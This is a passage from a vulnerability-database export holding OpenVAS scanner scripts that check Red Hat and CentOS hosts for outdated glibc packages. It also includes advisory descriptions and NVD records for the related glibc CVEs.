\"RHSA\", value: \"2012:0125-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0125-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:1361412562310870545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870545", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0125-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0125-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870545\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:55:19 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0125-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0125-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_4\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the 
standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). 
If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"RHENT_4\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881217", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881217", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0125 centos4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0125 centos4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881217\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:48:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0125\");\n script_name(\"CentOS Update for glibc CESA-2012:0125 centos4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the 
system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). 
If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment variables in the environment of a script that\n performed shell evaluation on the output of the locale command, ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res 
= isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:58:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2018-01-08T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:870629", "href": "http://plugins.openvas.org/nasl.php?oid=870629", "type": "openvas", "title": "RedHat Update for glibc RHSA-2011:1526-03", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2011:1526-03\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system\n cannot function properly.\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n Red Hat would like to thank Dan Rosenberg for reporting the CVE-2011-1089\n issue.\n\n This update also fixes several bugs and adds various enhancements.\n Documentation for these bug fixes and enhancements will be available\n shortly from the Technical Notes document, linked to in the References\n section.\n\n Users are advised to upgrade to these updated glibc packages, which contain\n backported patches to resolve these issues and add these enhancements.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-December/msg00004.html\");\n script_id(870629);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:36:25 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1526-03\");\n script_name(\"RedHat Update for glibc RHSA-2011:1526-03\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.47.el6\", 
rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T05:40:09", "description": "** DISPUTED ** ldd in the GNU C Library (aka glibc or libc6) 2.13 and earlier allows local users to gain privileges via a Trojan horse executable file linked with a modified loader that omits certain LD_TRACE_LOADED_OBJECTS checks. NOTE: the GNU C Library vendor states \"This is just nonsense. 
There are a gazillion other ways to introduce code if people are downloading arbitrary binaries and install them in appropriate directories or set LD_LIBRARY_PATH etc.\"", "edition": 6, "cvss3": {}, "published": "2011-03-30T22:55:00", "title": "CVE-2009-5064", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5064"], "modified": "2012-01-19T03:44:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:1.09.1", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:1.05", "cpe:/a:gnu:glibc:1.02", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:1.08", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:1.07", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:1.09", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:1.01", "cpe:/a:gnu:glibc:1.00", "cpe:/a:gnu:glibc:1.03", "cpe:/a:gnu:glibc:1.06", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:1.04", "cpe:/a:gnu:glibc:2.0.1"], "id": "CVE-2009-5064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5064", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:gnu:glibc:1.07:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.08:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.06:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:08", "description": "The svc_run function in the RPC implementation in glibc before 2.15 allows remote attackers to cause a denial of service (CPU consumption) via a large number of RPC connections.", "edition": 6, "cvss3": {}, "published": "2013-05-02T14:55:00", "title": "CVE-2011-4609", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4609"], "modified": "2013-05-03T04:00:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.9"], "id": "CVE-2011-4609", "href": 
